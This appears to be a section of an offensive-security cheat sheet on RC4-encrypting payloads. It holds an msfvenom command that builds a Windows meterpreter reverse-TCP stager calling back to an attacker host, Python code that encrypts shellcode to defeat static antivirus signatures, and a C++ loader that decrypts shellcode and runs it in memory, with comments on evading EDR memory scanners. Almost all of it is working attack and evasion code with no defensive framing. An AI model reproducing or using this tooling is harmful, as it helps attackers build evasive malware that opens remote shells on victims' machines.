RC4 Encryption

msfvenom — RC4-encrypted transport (the `reverse_tcp_rc4` stager encrypts the second stage in transit with RC4PASSWORD; the listening handler must be set to the same RC4PASSWORD. This is a separate layer from the at-rest shellcode encryption below.)

# RC4PASSWORD keys the stager's transport encryption; presumably the handler
# must be configured with the same value -- confirm against the handler options.
msfvenom --payload windows/meterpreter/reverse_tcp_rc4 \
  LHOST=<ip> LPORT=4444 RC4PASSWORD=MyKey123 \
  --format exe > rc4.exe

Python — RC4-encrypt a raw shellcode blob (`sc.bin`) at rest. The key is compiled into the decrypt stub, so this defeats static signatures on the payload bytes but provides no confidentiality against anyone holding the binary.

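def rc4_init(key: bytes) -> list:
    """Run the RC4 key-scheduling algorithm (KSA).

    Returns a fresh 256-entry permutation ``S`` seeded from ``key``. Hand it
    to ``rc4_crypt``, which advances it in place; build a new state for every
    message, otherwise a second call continues the same keystream.

    Args:
        key: secret key of at least one byte. RC4 indexes it cyclically, so
            any length works (the original raised ``ZeroDivisionError`` on
            an empty key; this version raises a clear ``ValueError``).

    Returns:
        list[int]: the scheduled state, a permutation of ``range(256)``.

    Raises:
        ValueError: if ``key`` is empty.
    """
    if not key:
        raise ValueError("RC4 key must not be empty")
    klen = len(key)
    s = list(range(256))
    j = 0
    for i in range(256):
        # & 0xFF == % 256 here: every operand is a non-negative byte value
        j = (j + s[i] + key[i % klen]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s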

def rc4_crypt(s: list, data: bytes) -> bytes:
    """RC4 PRGA: XOR ``data`` with the keystream drawn from state ``s``.

    Encryption and decryption are the same operation. ``s`` (the list
    returned by ``rc4_init``) is advanced in place, so calling this twice on
    one state continues the keystream rather than restarting it.

    Args:
        s: scheduled RC4 state; mutated.
        data: bytes to encrypt or decrypt.

    Returns:
        bytes: ``data`` XORed with the keystream, same length as ``data``.
    """
    i = j = 0
    result = bytearray(len(data))
    for pos, byte in enumerate(data):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        result[pos] = byte ^ s[(s[i] + s[j]) & 0xFF]
    return bytes(result)

# Must be byte-identical to the key compiled into the decrypt stub.
key = b"MyKey123"
with open("sc.bin", "rb") as f:
    sc = f.read()
# Fresh KSA state for this one blob; rc4_crypt advances it in place.
encrypted = rc4_crypt(rc4_init(key), sc)
with open("sc_rc4.bin", "wb") as f:
    f.write(encrypted)

C++ — RC4 decrypt + execute stub (decrypts the embedded blob in place at runtime, copies it into executable memory and jumps to it)

#include <Windows.h>
#include <cstring>   // memcpy
// RC4 state (S-box). Global and unsynchronized: rc4_init fills it and
// rc4_crypt advances it in place, so one key schedule serves one stream.
unsigned char s[256];

// RC4 key-scheduling algorithm: loads the global state s[] with a
// permutation of 0..255 derived from key[0..klen-1]. Precondition:
// klen > 0 (the key index is taken modulo klen).
void rc4_init(const unsigned char* key, int klen) {
    for (int i = 0; i < 256; i++)
        s[i] = (unsigned char)i;

    unsigned char j = 0;   // narrowing to a byte is the "% 256"
    for (int i = 0; i < 256; i++) {
        j = (unsigned char)(j + s[i] + key[i % klen]);
        unsigned char tmp = s[i];
        s[i] = s[j];
        s[j] = tmp;
    }
}

// RC4 PRGA: XORs data[0..dlen-1] in place with the keystream drawn from
// the global state s[], advancing s[] as a side effect. The same call both
// encrypts and decrypts; rc4_init must have been called first.
void rc4_crypt(unsigned char* data, int dlen) {
    unsigned char i = 0, j = 0;   // byte-width indices wrap at 256 by themselves
    for (int pos = 0; pos < dlen; pos++) {
        i = (unsigned char)(i + 1);
        j = (unsigned char)(j + s[i]);
        unsigned char tmp = s[i];
        s[i] = s[j];
        s[j] = tmp;
        data[pos] ^= s[(unsigned char)(s[i] + s[j])];
    }
}

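// Decrypts the embedded RC4 blob and transfers control to it.
// Returns 1 if memory could not be allocated or made executable.
int main() {
    // Must be byte-identical to the key used by the Python encryptor;
    // sizeof(key) - 1 drops the string's NUL terminator.
    const unsigned char key[] = "MyKey123";
    rc4_init(key, sizeof(key) - 1);

    unsigned char shellcode[] = { /* RC4 encrypted shellcode */ };
    const SIZE_T len = sizeof(shellcode);
    rc4_crypt(shellcode, (int)len);   // decrypt in place

    // Allocate read/write only, copy, then flip to read/execute. No RWX
    // page ever exists (a common EDR / memory-scanner heuristic) and the
    // region is not writable while it runs.
    void* mem = VirtualAlloc(0, len, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (mem == NULL)
        return 1;   // also trips when len == 0 (placeholder array left empty)
    memcpy(mem, shellcode, len);

    DWORD oldProtect = 0;
    if (!VirtualProtect(mem, len, PAGE_EXECUTE_READ, &oldProtect)) {
        VirtualFree(mem, 0, MEM_RELEASE);
        return 1;
    }
    // Harmless on x86/x64; required on architectures with split caches.
    FlushInstructionCache(GetCurrentProcess(), mem, len);

    ((void(*)())mem)();
    return 0;
}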